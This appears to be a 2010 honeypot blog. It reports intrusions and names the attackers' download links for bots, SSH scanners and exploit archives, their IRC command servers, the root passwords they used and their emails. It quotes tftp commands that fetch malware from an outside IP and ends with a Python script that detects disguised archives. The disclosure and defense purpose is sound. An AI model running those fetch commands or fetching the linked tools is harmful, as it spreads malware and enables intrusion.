Thursday, 28 January 2010

Oh no more tool!

Hi,

Found some tools being used on my machine. So let's share!


http://www.brotacel.007sites.com/shell.txt (mechbot)
http://www.members.lycos.co.uk/adralex/slutBot.tgz (mechbot)
http://npchk.110mb.com/redone.log (psybnc)
http://spdu.us/2009.tgz (wunderbar emporium2 exploit)
http://gabanu.home.ro/redone.log (psybnc)


And you can chat with the guys that posted the mechbots at undernet channel #can, #Adralex and #made



Wednesday, 27 January 2010

Hello, who is there?

Omg guys! Hacking a system and using the tftp command. That's so old-school!

tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE
tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE

But let's see what you guys are going to execute.

As far as I can see, you guys have some nice IRCs there:

mindleak.com
0xff.memzero.info
0x80.online-software.org
0x80.goingformars.com
0x80.martiansong.com
0x80.my1x1.com

And look at that: trying to steal all my passwords and sniff my keyboard and put them in a file called pstorec.dll. So if you lost your passwords, you just scan your computer for pstorec.dll.


Look at that, a blast from the past. These guys are actually using some old code:


mssqludp.c
mssql2000.c
mssql.c
veritas.c
lsass135.c
lsass445.c
rpc445.c
rpc135.c
dcom445.c
dcom135.c

Like I ever use a non-updated Windows XP or a 2K machine.



If you ever want to see an old bot IRC you should check this one out!

/server 194.109.11.65 6556

channel: #9#, #raw #exploit


Tuesday, 26 January 2010

New toys

Just found some new toys to play with: an SSH scanner and a mechbot. This guy even made a nice script for it. Almost untraceable ... not ... You can find the unixbots on undernet, channel #can.

#ReMuSeR - Private Version
[+] Exemplu : ./start channel

http://kilix.clan.su/ssh.tgz (SSH scanner)
http://remuser.host.sk/linux.jpg (unrar/zip/tar it)

Monday, 25 January 2010

Think your password is secure?

Nope, it doesn't matter if you have ukd718qmq or 12phpgopr or even 1hxtq65e as a password. There are always people out there trying to infect your computer with a virus that sends your password to them.

A few tips to be secure.

1. Don't accept files from friends that contain a .pif, .jpg, .gif, .bmp or .exe.
2. Make sure you double-check files before opening them.
3. Use a virus scanner or send the file to http://www.virustotal.com
4. Change your password often, especially for banking, PayPal accounts etc.
5. Check the website at http://www.siteadvisor.com/
6. Firefox users: use the NoScript add-on. (I know it could be a pain in the ass. But scammers like to infect you through advertisements.)
7. Update your software often.
8. Use Linux Mint/Ubuntu.
9. Do you have a nephew/uncle/neighbour who claims to know a lot about computers? They rarely are professionals and know very little about security....
10. Unplug the internet and live in a forest. Be one with nature!

I wonder

If the feds know about crimeirc.net channel #ccpower.

crimeirc.net Estimated Worth $1408.9 USD






Dear admin,

By the time you find this it means
that u have found me on your box..
I just wanna tell u some things..
1. if i done any damage to your box,
i didn't do it on pourpuse
2.i didn't alter any files.. like ps/netstat..
3.if you need any help in securing your box/removing
my rootkit.. email me or somethin.. *******@yahoo.com
Best regards,
Your Rootkit ;)

Ripping it and calling it private

First of all: my English sucks! I know!

But what I've seen so far is that people are just ripping other people's tools and calling them private! The source looks the same to me; only the header is changed. Why?

Unixbots at undernet channel #colombo10

Found: trapped in honeypot
IP used: 172.158.130.36


Channel: #colombo10
Bot owner: colo1
Using: EnergyMech, IRC Bot software
Email: GigiBazat@Yahoo.com

Passwords used to change Root of SSHD

!@#$cristimata!@#$
pulamea123daumuie
halt
123456

Software downloads:

http://zomby2009.ilive.ro/0809.tgz (contains exploits)
http://colomboten.ucoz.ru/kriss.tgz (contains a scanner)
http://www.visatorul.go.ro/Quick.mp3 (contains a scanner)
http://colomboten.ucoz.ru/fast.tgz (contains a mechbot)
http://www.personale.110mb.com/scan/scanner.tgz
http://www.tiger1ne.netfast.org/linuxteam.tgz (contains a scanner)

Work directory

/var/tmp

Additional information:

You will find some old kernel exploits from August (0809.tgz)
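
Two of the downloads listed above are archives carrying media extensions (linux.jpg, Quick.mp3), and the work directory was /var/tmp. The following Python script is an added example, not part of the original posts: it walks a directory and reports files named as image or audio whose leading bytes identify an archive. The extension set and the magic-byte table are assumptions chosen for illustration.

```python
"""Report files whose media extension hides an archive (added example)."""
import os
import sys

# Assumption: extensions treated as "media" for this check.
MEDIA_EXTS = {".jpg", ".jpeg", ".gif", ".bmp", ".png", ".mp3"}

# (offset, magic bytes, archive type); well-known file signatures.
ARCHIVE_MAGIC = [
    (0, b"\x1f\x8b", "gzip"),
    (0, b"BZh", "bzip2"),
    (0, b"PK\x03\x04", "zip"),
    (0, b"Rar!\x1a\x07", "rar"),
    (257, b"ustar", "tar"),
]


def archive_type(path):
    """Return the archive type named by the file's magic bytes, or None."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(512)
    except OSError:
        return None  # unreadable file: nothing to report
    for offset, magic, kind in ARCHIVE_MAGIC:
        if head[offset:offset + len(magic)] == magic:
            return kind
    return None


def find_disguised_archives(root):
    """Return sorted (path, archive_type) pairs for media-named archives."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            # Skip symlinks and special files (a FIFO would block on open).
            if ext not in MEDIA_EXTS or os.path.islink(path) or not os.path.isfile(path):
                continue
            kind = archive_type(path)
            if kind:
                hits.append((path, kind))
    return sorted(hits)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/var/tmp"
    for path, kind in find_disguised_archives(target):
        print(f"{path}: named as media, content is {kind}")
```

A hit only says the name and the content disagree; what is inside the archive still has to be examined on an isolated analysis machine.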